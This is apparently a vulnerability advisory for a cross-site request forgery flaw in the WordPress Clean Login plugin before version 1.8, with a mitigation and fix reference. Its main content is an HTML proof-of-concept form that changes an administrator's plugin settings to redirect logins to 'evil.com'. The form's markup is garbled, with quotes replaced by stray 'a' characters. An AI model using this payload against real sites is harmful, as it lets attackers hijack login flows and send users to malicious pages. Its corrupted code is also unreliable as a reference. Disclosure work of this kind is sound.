WordPress Clean Login plugin versions prior to 1.8 suffer from a cross site request forgery vulnerability.
d394c043b0c71f8bc31e0732dcfb0921
===============
Software Description
===============
Software:clean login
version:<1.8
description:Responsive Frontend Login and Registration plugin.
========
Details
========
CSRF in wordpress plugin clean login allows remote attacker change wordpress login redirect url or logout redirect url to evil address.
========
POC:
========
<form method="POST" action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=wpcsw_settings">
<input type="text" name= "adminbar" value=aon">
a<input type="text" name="emailnotificationcontent" value="">
a<input type="text" name="termsconditionsMSG" value="">
a<input type="text" name="termsconditionsURL" value="">
a<input type="text" name="urlredirect" value=ahttp://127.0.0.1/wordpressa>
a<input type=atexta name="loginredirecta value=aona>
a<input type=atexta name="loginredirect_urla value="http://evil.coma>
a<input type=atexta name="logoutredirect_urla value="http://127.0.0.1/wordpressa>
a<input type=atexta name="cl_hidden_fielda value="hidden_field_to_update_othersa>
a<input type=atexta name="Submita value="Save Changesa>
<input type="submita>
</form>
=========
Mitigations
================
Disable the plugin until a new version is released that fixes this bug.
=========
Fixed
=========
https://wordpress.org/plugins/clean-login/#developers(1.8 version update)